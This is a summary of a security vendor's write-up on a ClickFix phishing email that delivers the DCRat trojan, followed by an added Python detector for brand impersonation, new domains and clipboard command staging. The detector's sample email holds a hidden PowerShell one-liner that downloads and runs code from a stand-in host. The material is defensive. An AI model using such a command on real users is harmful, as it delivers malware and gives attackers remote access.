Detecting an email-based ClickFix attack that delivers DCRat malware payload
Blog post from Sublime Security
Sublime's Attack Spotlight series highlights a sophisticated email threat: a malware attack delivered through a fake email thread about an apartment rental. The attacker used social engineering, fabricating a scenario involving a sick colleague, to prompt the recipient to engage with a malicious link masquerading as a Booking.com "Accommodation Rules" page. That link led to a deceptive CAPTCHA that silently copied a malicious PowerShell command to the user's clipboard; if executed, the command would download and run a DCRat malware payload. DCRat, a well-documented .NET-based remote access trojan, is capable of executing shell commands, keylogging, and stealing files, among other functions. Sublime's AI-powered detection engine flagged and blocked the attack by identifying key signals such as newly registered domains, brand impersonation, and social engineering tactics. The series emphasizes the importance of adaptive email security platforms that use AI and machine learning to detect and prevent evolving threats.
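The three detection signals named above (a link whose visible text impersonates a brand but resolves to an unrelated host, a recently registered domain, and page script that stages a shell command on the clipboard) can each be checked mechanically on an email's HTML body. The following is an added example written for this summary; it is not Sublime's detection code and not material from the original post. The email body, the domain registration dates and the 30-day "newly registered" threshold are all constructed assumptions; a real deployment would replace the `DOMAIN_REGISTERED` dictionary with a WHOIS/RDAP lookup.

```python
"""Heuristic triage of an email HTML body for ClickFix-style indicators (added example)."""
import re
from datetime import date
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample email body: an anchor whose visible text claims Booking.com but points
# elsewhere, and a fake "CAPTCHA" script that writes a PowerShell one-liner to the clipboard.
SAMPLE_HTML = """
<html><body>
<p>Hi, my colleague is out sick today, could you review the
<a href="https://accommodation-rules-verify.example/captcha">Booking.com Accommodation Rules</a> page?</p>
<script>
function verify(){ navigator.clipboard.writeText("powershell -w hidden -c \\"irm https://accommodation-rules-verify.example/s | iex\\""); }
</script>
</body></html>
"""

# Stand-in for a WHOIS/RDAP registration-date lookup; the date is constructed (assumption).
DOMAIN_REGISTERED = {"accommodation-rules-verify.example": date(2025, 3, 1)}
NEW_DOMAIN_DAYS = 30                       # assumed threshold for "newly registered"
BRANDS = ("booking.com",)                  # brands whose names are checked against link targets

CLIPBOARD_API = re.compile(r"clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
SHELL_HINT = re.compile(r"powershell|mshta|cmd(\.exe)?\b|\biex\b|Invoke-Expression", re.I)


class _Collector(HTMLParser):
    """Collects (href, visible text) pairs for anchors and the raw text of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.links, self.scripts = [], []
        self._href, self._text, self._script_buf, self._in_script = None, [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
        elif tag == "script":
            self._in_script, self._script_buf = True, []

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None
        elif tag == "script":
            self.scripts.append("".join(self._script_buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)
        elif self._href is not None:
            self._text.append(data)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def brand_mismatch(href, text):
    """Return the impersonated brand if the anchor text names it but the host is not that brand."""
    host = host_of(href)
    for brand in BRANDS:
        if brand in text.lower() and not (host == brand or host.endswith("." + brand)):
            return brand
    return None


def is_newly_registered(host, today, registry=DOMAIN_REGISTERED):
    registered = registry.get(host)
    return registered is not None and (today - registered).days <= NEW_DOMAIN_DAYS


def clipboard_staging(script):
    """True when a script both writes to the clipboard and the surrounding text names a shell."""
    return bool(CLIPBOARD_API.search(script) and SHELL_HINT.search(script))


def triage(html, today, registry=DOMAIN_REGISTERED):
    """Return the list of signal labels raised by the body; an empty list means nothing fired."""
    collector = _Collector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        brand = brand_mismatch(href, text)
        if brand:
            findings.append(f"brand_impersonation:{brand}->{host_of(href)}")
        if is_newly_registered(host_of(href), today, registry):
            findings.append(f"newly_registered_domain:{host_of(href)}")
    for script in collector.scripts:
        if clipboard_staging(script):
            findings.append("clipboard_command_staging")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML, date(2025, 3, 10)):
        print(finding)
```

Each signal on its own is weak (legitimate pages copy text to the clipboard, and new domains are registered daily), which is why the triage returns all of them and leaves the scoring to the caller; a body that raises brand impersonation, a newly registered link host and clipboard staging together is the pattern described in the post.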